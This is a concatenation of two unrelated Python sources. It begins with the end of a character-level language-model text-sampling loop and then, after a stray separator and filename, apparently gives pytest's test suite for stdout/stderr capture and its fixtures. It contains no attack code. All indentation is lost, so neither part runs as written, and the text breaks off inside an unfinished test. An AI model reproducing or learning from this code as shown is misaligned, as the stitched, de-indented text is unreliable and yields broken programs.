print_begin = 0
out_txt = ''
for i in range(LENGTH_OF_EACH):
if i == 0:
print_begin = real_len
with torch.no_grad():
if RUN_DEVICE == 'dml':
if real_len < ctx_len:
xxx = np.pad(x, (0, ctx_len - real_len))
else:
xxx = x
out = rt_session.run(None, {rt_session.get_inputs()[0].name: [xxx[-ctx_len:]]})
out = torch.tensor(out[0])
else:
xxx = torch.tensor(x[-ctx_len:], dtype=torch.long)[None,...]
if RUN_DEVICE == 'gpu':
xxx = xxx.cuda()
out, _ = model(xxx)
out[:, :, UNKNOWN_CHAR] = -float('Inf')
pos = -1 if real_len >= ctx_len else real_len - 1
if train_dataset.itos[int(x[real_len-1])] == '\n':
char = src.utils.sample_logits(
out, pos, temperature=1.0, top_p=0.995)
else:
char = src.utils.sample_logits(
out, pos, temperature=1.0, min_p_pow=2.0, min_p_ratio=min_p_ratio)
x = np.append(x, char)
real_len += 1
completion = ''.join([train_dataset.itos[int(i)]
for i in x[print_begin:real_len]])
out_txt += completion
print_begin = real_len
outmsg = {}
outmsg['op'] = 'TXT'
outmsg['txt'] = out_txt
queueX.put((K, json.dumps(outmsg, separators=(',', ':'))))
# if _DEBUG_LEVEL_ > 1:
# print(time.time() - ttt, end=' ')
ttt = time.time()
if _DEBUG_LEVEL_ > 1:
print(context, end = '')
print(out_txt + '\n' + ('=' * 20))
if __name__ == "__main__":
main()
|
test_capture.py
|
import contextlib
import io
import os
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
from typing import BinaryIO
from typing import Generator
import pytest
from _pytest import capture
from _pytest.capture import _get_multicapture
from _pytest.capture import CaptureManager
from _pytest.capture import MultiCapture
from _pytest.config import ExitCode
# note: py.io capture tests were copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def StdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
def TeeStdCapture(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.TeeSysCapture)
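# The three helpers above build MultiCapture objects with different backends:
# FDCapture works at the file-descriptor level, SysCapture swaps out
# sys.stdout / sys.stderr, and TeeSysCapture captures while still passing the
# output through to the original streams.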
class TestCaptureManager:
@pytest.mark.parametrize("method", ["no", "sys", "fd"])
def test_capturing_basic_api(self, method):
capouter = StdCaptureFD()
old = sys.stdout, sys.stderr, sys.stdin
try:
capman = CaptureManager(method)
capman.start_global_capturing()
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
capman.suspend_global_capture()
outerr = capman.read_global_capture()
assert outerr == ("", "")
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method == "no":
assert old == (sys.stdout, sys.stderr, sys.stdin)
else:
assert not out
capman.resume_global_capture()
print("hello")
capman.suspend_global_capture()
out, err = capman.read_global_capture()
if method != "no":
assert out == "hello\n"
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
def test_init_capturing(self):
capouter = StdCaptureFD()
try:
capman = CaptureManager("fd")
capman.start_global_capturing()
pytest.raises(AssertionError, capman.start_global_capturing)
capman.stop_global_capturing()
finally:
capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
obj = "'b\u00f6y'"
testdir.makepyfile(
"""\
# taken from issue 227 from nosetests
def test_unicode():
import sys
print(sys.stdout)
print(%s)
"""
% obj
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
testdir.makepyfile(
"""\
def test_unicode():
print('b\\u00f6y')
"""
)
result = testdir.runpytest("--capture=%s" % method)
result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
p = testdir.makepyfile(
"""
import sys
print("collect %s failure" % 13)
sys.stderr.write("collect %s_stderr failure" % 13)
import xyz42123
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*Captured stdout*",
"collect 13 failure",
"*Captured stderr*",
"collect 13_stderr failure",
]
)
class TestPerTestCapturing:
def test_capture_and_fixtures(self, testdir):
p = testdir.makepyfile(
"""
def setup_module(mod):
print("setup module")
def setup_function(function):
print("setup " + function.__name__)
def test_func1():
print("in func1")
assert 0
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"setup module*",
"setup test_func1*",
"in func1*",
"setup test_func2*",
"in func2*",
]
)
@pytest.mark.xfail(reason="unimplemented feature")
def test_capture_scope_cache(self, testdir):
p = testdir.makepyfile(
"""
import sys
def setup_module(func):
print("module-setup")
def setup_function(func):
print("function-setup")
def test_func():
print("in function")
assert 0
def teardown_function(func):
print("in teardown")
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*test_func():*",
"*Captured stdout during setup*",
"module-setup*",
"function-setup*",
"*Captured stdout*",
"in teardown*",
]
)
def test_no_carry_over(self, testdir):
p = testdir.makepyfile(
"""
def test_func1():
print("in func1")
def test_func2():
print("in func2")
assert 0
"""
)
result = testdir.runpytest(p)
s = result.stdout.str()
assert "in func1" not in s
assert "in func2" in s
def test_teardown_capturing(self, testdir):
p = testdir.makepyfile(
"""
def setup_function(function):
print("setup func1")
def teardown_function(function):
print("teardown func1")
assert 0
def test_func1():
print("in func1")
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*teardown_function*",
"*Captured stdout*",
"setup func1*",
"in func1*",
"teardown func1*",
# "*1 fixture failure*"
]
)
def test_teardown_capturing_final(self, testdir):
p = testdir.makepyfile(
"""
def teardown_module(mod):
print("teardown module")
assert 0
def test_func():
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*def teardown_module(mod):*",
"*Captured stdout*",
"*teardown module*",
"*1 error*",
]
)
def test_capturing_outerr(self, testdir):
p1 = testdir.makepyfile(
"""\
import sys
def test_capturing():
print(42)
sys.stderr.write(str(23))
def test_capturing_error():
print(1)
sys.stderr.write(str(2))
raise ValueError
"""
)
result = testdir.runpytest(p1)
result.stdout.fnmatch_lines(
[
"*test_capturing_outerr.py .F*",
"====* FAILURES *====",
"____*____",
"*test_capturing_outerr.py:8: ValueError",
"*--- Captured stdout *call*",
"1",
"*--- Captured stderr *call*",
"2",
]
)
class TestLoggingInteraction:
def test_logging_stream_ownership(self, testdir):
p = testdir.makepyfile(
"""\
def test_logging():
import logging
import pytest
stream = capture.CaptureIO()
logging.basicConfig(stream=stream)
stream.close() # to free memory/release resources
"""
)
result = testdir.runpytest_subprocess(p)
assert result.stderr.str().find("atexit") == -1
def test_logging_and_immediate_setupteardown(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_function(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_function(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors show first!
)
# verify proper termination
assert "closed" not in s
def test_logging_and_crossscope_fixtures(self, testdir):
p = testdir.makepyfile(
"""\
import logging
def setup_module(function):
logging.warning("hello1")
def test_logging():
logging.warning("hello2")
assert 0
def teardown_module(function):
logging.warning("hello3")
assert 0
"""
)
for optargs in (("--capture=sys",), ("--capture=fd",)):
print(optargs)
result = testdir.runpytest_subprocess(p, *optargs)
s = result.stdout.str()
result.stdout.fnmatch_lines(
["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"] # errors come first
)
# verify proper termination
assert "closed" not in s
def test_conftestlogging_is_shown(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
logging.warning("hello435")
"""
)
# make sure that logging is still captured in tests
result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
assert result.ret == ExitCode.NO_TESTS_COLLECTED
result.stderr.fnmatch_lines(["WARNING*hello435*"])
assert "operation on closed file" not in result.stderr.str()
def test_conftestlogging_and_test_logging(self, testdir):
testdir.makeconftest(
"""\
import logging
logging.basicConfig()
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello():
import logging
logging.warning("hello433")
assert 0
"""
)
result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
assert result.ret != 0
result.stdout.fnmatch_lines(["WARNING*hello433*"])
assert "something" not in result.stderr.str()
assert "operation on closed file" not in result.stderr.str()
def test_logging_after_cap_stopped(self, testdir):
testdir.makeconftest(
"""\
import pytest
import logging
log = logging.getLogger(__name__)
@pytest.fixture
def log_on_teardown():
yield
log.warning('Logging on teardown')
"""
)
# make sure that logging is still captured in tests
p = testdir.makepyfile(
"""\
def test_hello(log_on_teardown):
import logging
logging.warning("hello433")
assert 1
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
assert result.ret != 0
result.stdout.fnmatch_lines(
["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
)
assert (
"AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
not in result.stderr.str()
)
class TestCaptureFixture:
@pytest.mark.parametrize("opt", [[], ["-s"]])
def test_std_functional(self, testdir, opt):
reprec = testdir.inline_runsource(
"""\
def test_hello(capsys):
print(42)
out, err = capsys.readouterr()
assert out.startswith("42")
""",
*opt,
)
reprec.assertoutcome(passed=1)
def test_capsyscapfd(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfd):
pass
def test_two(capfd, capsys):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
[
"*ERROR*setup*test_one*",
"E*capfd*capsys*same*time*",
"*ERROR*setup*test_two*",
"E*capsys*capfd*same*time*",
"*2 errors*",
]
)
def test_capturing_getfixturevalue(self, testdir):
"""Test that asking for "capfd" and "capsys" using request.getfixturevalue
in the same test is an error.
"""
testdir.makepyfile(
"""\
def test_one(capsys, request):
request.getfixturevalue("capfd")
def test_two(capfd, request):
request.getfixturevalue("capsys")
"""
)
result = testdir.runpytest()
result.stdout.fnmatch_lines(
[
"*test_one*",
"E * cannot use capfd and capsys at the same time",
"*test_two*",
"E * cannot use capsys and capfd at the same time",
"*2 failed in*",
]
)
def test_capsyscapfdbinary(self, testdir):
p = testdir.makepyfile(
"""\
def test_one(capsys, capfdbinary):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(
["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
)
@pytest.mark.parametrize("method", ["sys", "fd"])
def test_capture_is_represented_on_failure_issue128(self, testdir, method):
p = testdir.makepyfile(
"""\
def test_hello(cap{}):
print("xxx42xxx")
assert 0
""".format(
method
)
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["xxx42xxx"])
def test_stdfd_functional(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfd):
import os
os.write(1, b"42")
out, err = capfd.readouterr()
assert out.startswith("42")
capfd.close()
"""
)
reprec.assertoutcome(passed=1)
def test_capfdbinary(self, testdir):
reprec = testdir.inline_runsource(
"""\
def test_hello(capfdbinary):
import os
# some likely un-decodable bytes
os.write(1, b'\\xfe\\x98\\x20')
out, err = capfdbinary.readouterr()
assert out == b'\\xfe\\x98\\x20'
assert err == b''
"""
)
reprec.assertoutcome(passed=1)
def test_capsysbinary(self, testdir):
p1 = testdir.makepyfile(
r"""
def test_hello(capsysbinary):
import sys
sys.stdout.buffer.write(b'hello')
# Some likely un-decodable bytes.
sys.stdout.buffer.write(b'\xfe\x98\x20')
sys.stdout.buffer.flush()
# Ensure writing in text mode still works and is captured.
# https://github.com/pytest-dev/pytest/issues/6871
print("world", flush=True)
out, err = capsysbinary.readouterr()
assert out == b'hello\xfe\x98\x20world\n'
assert err == b''
print("stdout after")
print("stderr after", file=sys.stderr)
"""
)
result = testdir.runpytest(str(p1), "-rA")
result.stdout.fnmatch_lines(
[
"*- Captured stdout call -*",
"stdout after",
"*- Captured stderr call -*",
"stderr after",
"*= 1 passed in *",
]
)
def test_partial_setup_failure(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capsys, missingarg):
pass
"""
)
result = testdir.runpytest(p)
result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])
def test_keyboardinterrupt_disables_capturing(self, testdir):
p = testdir.makepyfile(
"""\
def test_hello(capfd):
import os
os.write(1, b'42')
raise KeyboardInterrupt()
"""
)
result = testdir.runpytest_subprocess(p)
result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
assert result.ret == 2
def test_capture_and_logging(self, testdir):
"""#14"""
p = testdir.makepyfile(
"""\
import logging
def test_log(capsys):
logging.error('x')
"""
)
result = testdir.runpytest_subprocess(p)
assert "closed" not in result.stderr.str()
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
@pytest.mark.parametrize("no_capture", [True, False])
def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
testdir.makepyfile(
"""\
def test_disabled({fixture}):
print('captured before')
with {fixture}.disabled():
print('while capture is disabled')
print('captured after')
assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')
def test_normal():
print('test_normal executed')
""".format(
fixture=fixture
)
)
args = ("-s",) if no_capture else ()
result = testdir.runpytest_subprocess(*args)
result.stdout.fnmatch_lines(["*while capture is disabled*", "*= 2 passed in *"])
result.stdout.no_fnmatch_line("*captured before*")
result.stdout.no_fnmatch_line("*captured after*")
if no_capture:
assert "test_normal executed" in result.stdout.str()
else:
result.stdout.no_fnmatch_line("*test_normal executed*")
@pytest.mark.parametrize("fixture", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""
Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
"""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestCaptureAndPassthroughIO(TestCaptureIO):
def test_text(self):
sio = io.StringIO()
f = capture.CaptureAndPassthroughIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self):
sio = io.StringIO()
f = capture.CaptureAndPassthroughIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(IOError, f.read)
pytest.raises(IOError, f.readlines)
iter_f = iter(f)
pytest.raises(IOError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
@pytest.fixture
def tmpfile(testdir) -> Generator[BinaryIO, None, None]:
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof' ({!r})".format(exc))
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
s = cap.snap()
cap.done()
assert not s
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(ValueError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2.decode("ascii"))
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AttributeError, cap.suspend)
assert repr(cap) == (
"<FDCapture 1 oldfd=<UNSET> _state='done' tmpfile={!r}>".format(
cap.tmpfile
)
)
# Should not crash with missing "_old".
assert repr(cap.syscapture) == (
"<SysCapture stdout _old=<UNSET> _state='done' tmpfile={!r}>".format(
cap.syscapture.tmpfile
)
)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(IOError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self):
""" for TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n" """
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert repr(cap.out) == "<FDCapture 1 oldfd=<UNSET> _state=None tmpfile=<UNSET>>"
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert repr(cap.err) == "<FDCapture 2 oldfd=<UNSET> _state=None tmpfile=<UNSET>>"
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert repr(cap.in_) == "<FDCapture 0 oldfd=<UNSET> _state=None tmpfile=<UNSET>>"
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
@pytest.mark.parametrize("use", [True, False])
def test_fdcapture_tmpfile_remains_the_same(tmpfile, use):
if not use:
tmpfile = True
cap = StdCaptureFD(out=False, err=tmpfile)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize("method", ["SysCapture", "FDCapture", "TeeSysCapture"])
def test_capturing_and_logging_fundamentals(testdir, method):
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(out=False, in_=False,
Capture=capture.%s)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "replace"
assert sys.stderr.errors == "replace"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win") and sys.version_info[:2] >= (3, 6),
reason="only py3.6+ on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams():
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = DummyStream()
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*IOError*")
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
